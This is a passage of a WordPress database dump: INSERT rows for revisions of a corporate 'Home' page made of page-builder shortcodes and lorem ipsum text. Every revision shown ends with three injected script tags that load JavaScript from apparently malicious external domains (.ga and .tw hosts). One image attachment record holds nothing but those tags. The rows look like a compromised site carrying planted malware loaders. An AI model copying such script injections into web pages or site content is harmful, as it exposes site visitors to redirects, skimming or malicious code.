tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-10 18:52:10','2018-01-10 18:52:10','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/10/5-revision-v1/',0,'revision','',0),(6610,1,'2018-01-10 18:53:02','2018-01-10 18:53:02','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-10 18:53:02','2018-01-10 18:53:02','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/10/5-revision-v1/',0,'revision','',0),(6611,1,'2018-01-10 18:53:32','2018-01-10 18:53:32','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why choose us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Reason to use our service</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Best Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][recent_posts style=\"default\" category=\"all\" columns=\"3\" order=\"DESC\" orderby=\"date\" posts_per_page=\"3\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-10 18:53:32','2018-01-10 18:53:32','',5,'http://sandbox.futuremediatrix.com/medikpro/2018/01/10/5-revision-v1/',0,'revision','',0),(6612,1,'2018-01-11 00:47:44','2018-01-11 00:47:44','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','bg-main','','inherit','open','closed','','bg-main','','','2018-01-11 00:47:44','2018-01-11 00:47:44','',5,'http://sandbox.futuremediatrix.com/medikpro/wp-content/uploads/2018/01/bg-main.jpg',0,'attachment','image/jpeg',0),(6613,1,'2018-01-11 00:48:47','2018-01-11 00:48:47','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#f9f7f5\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" id=\"services\" 